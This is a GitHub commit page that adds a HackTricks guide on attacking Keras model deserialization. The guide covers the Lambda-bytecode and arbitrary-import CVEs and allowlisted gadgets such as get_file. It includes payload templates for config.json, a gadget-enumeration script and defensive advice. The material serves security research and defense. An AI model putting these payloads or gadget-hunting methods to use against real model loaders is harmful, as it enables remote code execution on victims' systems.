Skip to content

Commit 1624c21

Browse files
authored
Merge pull request #1313 from HackTricks-wiki/update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658
Hunting Vulnerabilities in Keras Model Deserialization
2 parents ed872d2 + 3227cd6 commit 1624c21

4 files changed

Lines changed: 231 additions & 1 deletion

File tree

src/AI/AI-Models-RCE.md

Lines changed: 10 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -177,11 +177,20 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
177177
tf.add(PAYLOAD) # rides the symlink
178178
```
179179

180+
### Deep-dive: Keras .keras deserialization and gadget hunting
181+
182+
For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:
183+
184+
185+
{{#ref}}
186+
../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
187+
{{#endref}}
188+
180189
## References
181190

182191
- [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
183192
- [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
184193
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
185194
- [PyTorch – security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
186195

187-
{{#include ../banners/hacktricks-training.md}}
196+
{{#include ../banners/hacktricks-training.md}}

src/SUMMARY.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -69,6 +69,7 @@
6969
- [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
7070
- [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md)
7171
- [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
72+
- [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md)
7273
- [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md)
7374
- [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
7475
- [venv](generic-methodologies-and-resources/python/venv.md)

src/generic-methodologies-and-resources/python/README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,7 @@
77

88
- [**Pyscript hacking tricks**](pyscript.md)
99
- [**Python deserializations**](../../pentesting-web/deserialization/README.md)
10+
- [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md)
1011
- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md)
1112
- [**Basic python web requests syntax**](web-requests.md)
1213
- [**Basic python syntax and libraries**](basic-python.md)
Lines changed: 219 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,219 @@
1+
# Keras Model Deserialization RCE and Gadget Hunting
2+
3+
{{#include ../../banners/hacktricks-training.md}}
4+
5+
This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets.
6+
7+
## .keras model format internals
8+
9+
A .keras file is a ZIP archive containing at least:
10+
- metadata.json – generic info (e.g., Keras version)
11+
- config.json – model architecture (primary attack surface)
12+
- model.weights.h5 – weights in HDF5
13+
14+
The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries.
15+
16+
Example snippet for a Dense layer object:
17+
18+
```json
19+
{
20+
"module": "keras.layers",
21+
"class_name": "Dense",
22+
"config": {
23+
"units": 64,
24+
"activation": {
25+
"module": "keras.activations",
26+
"class_name": "relu"
27+
},
28+
"kernel_initializer": {
29+
"module": "keras.initializers",
30+
"class_name": "GlorotUniform"
31+
}
32+
}
33+
}
34+
```
35+
36+
Deserialization performs:
37+
- Module import and symbol resolution from module/class_name keys
38+
- from_config(...) or constructor invocation with attacker-controlled kwargs
39+
- Recursion into nested objects (activations, initializers, constraints, etc.)
40+
41+
Historically, this exposed three primitives to an attacker crafting config.json:
42+
- Control of what modules are imported
43+
- Control of which classes/functions are resolved
44+
- Control of kwargs passed into constructors/from_config
45+
46+
## CVE-2024-3660 – Lambda-layer bytecode RCE
47+
48+
Root cause:
49+
- Lambda.from_config() used python_utils.func_load(...) which base64-decodes and calls marshal.loads() on attacker bytes; Python unmarshalling can execute code.
50+
51+
Exploit idea (simplified payload in config.json):
52+
53+
```json
54+
{
55+
"module": "keras.layers",
56+
"class_name": "Lambda",
57+
"config": {
58+
"name": "exploit_lambda",
59+
"function": {
60+
"function_type": "lambda",
61+
"bytecode_b64": "<attacker_base64_marshal_payload>"
62+
}
63+
}
64+
}
65+
```
66+
67+
Mitigation:
68+
- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False.
69+
70+
Notes:
71+
- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders.
72+
73+
## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8
74+
75+
Root cause:
76+
- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json.
77+
- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs.
78+
79+
Exploit idea:
80+
81+
```json
82+
{
83+
"module": "maliciouspkg",
84+
"class_name": "Danger",
85+
"config": {"arg": "val"}
86+
}
87+
```
88+
89+
Security improvements (Keras ≥ 3.9):
90+
- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp
91+
- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
92+
- Basic type checking: deserialized objects must match expected types
93+
94+
## Post-fix gadget surface inside allowlist
95+
96+
Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
97+
98+
Gadget via Lambda that references an allowed function (not serialized Python bytecode):
99+
100+
```json
101+
{
102+
"module": "keras.layers",
103+
"class_name": "Lambda",
104+
"config": {
105+
"name": "dl",
106+
"function": {"module": "keras.utils", "class_name": "get_file"},
107+
"arguments": {
108+
"fname": "artifact.bin",
109+
"origin": "https://example.com/artifact.bin",
110+
"cache_dir": "/tmp/keras-cache"
111+
}
112+
}
113+
}
114+
```
115+
116+
Important limitation:
117+
- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
118+
119+
Potential impacts of allowlisted gadgets:
120+
- Arbitrary download/write (path planting, config poisoning)
121+
- Network callbacks/SSRF-like effects depending on environment
122+
- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
123+
124+
## Researcher toolkit
125+
126+
1) Systematic gadget discovery in allowed modules
127+
128+
Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
129+
130+
```python
131+
import importlib, inspect, pkgutil
132+
133+
ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]
134+
135+
seen = set()
136+
137+
def iter_modules(mod):
138+
if not hasattr(mod, "__path__"):
139+
return
140+
for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."):
141+
yield m.name
142+
143+
candidates = []
144+
for root in ALLOWLIST:
145+
try:
146+
r = importlib.import_module(root)
147+
except Exception:
148+
continue
149+
for name in iter_modules(r):
150+
if name in seen:
151+
continue
152+
seen.add(name)
153+
try:
154+
m = importlib.import_module(name)
155+
except Exception:
156+
continue
157+
for n, obj in inspect.getmembers(m):
158+
if inspect.isfunction(obj) or inspect.isclass(obj):
159+
sig = None
160+
try:
161+
sig = str(inspect.signature(obj))
162+
except Exception:
163+
pass
164+
doc = (inspect.getdoc(obj) or "").lower()
165+
text = f"{name}.{n} {sig} :: {doc}"
166+
# Heuristics: look for I/O or network-ish hints
167+
if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]):
168+
candidates.append(text)
169+
170+
print("\n".join(sorted(candidates)[:200]))
171+
```
172+
173+
2) Direct deserialization testing (no .keras archive needed)
174+
175+
Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
176+
177+
```python
178+
from keras import layers
179+
180+
cfg = {
181+
"module": "keras.layers",
182+
"class_name": "Lambda",
183+
"config": {
184+
"name": "probe",
185+
"function": {"module": "keras.utils", "class_name": "get_file"},
186+
"arguments": {"fname": "x", "origin": "https://example.com/x"}
187+
}
188+
}
189+
190+
layer = layers.deserialize(cfg, safe_mode=True) # Observe behavior
191+
```
192+
193+
3) Cross-version probing and formats
194+
195+
Keras exists in multiple codebases/eras with different guardrails and formats:
196+
- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion)
197+
- tf-keras: maintained separately
198+
- Multi-backend Keras 3 (official): introduced native .keras
199+
200+
Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
201+
202+
## Defensive recommendations
203+
204+
- Treat model files as untrusted input. Only load models from trusted sources.
205+
- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
206+
- Do not set safe_mode=False when loading models unless you fully trust the file.
207+
- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
208+
- Enforce allowlists/signatures for model sources and integrity checking where possible.
209+
210+
## References
211+
212+
- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
213+
- [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751)
214+
- [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
215+
- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
216+
- [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
217+
- [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)
218+
219+
{{#include ../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)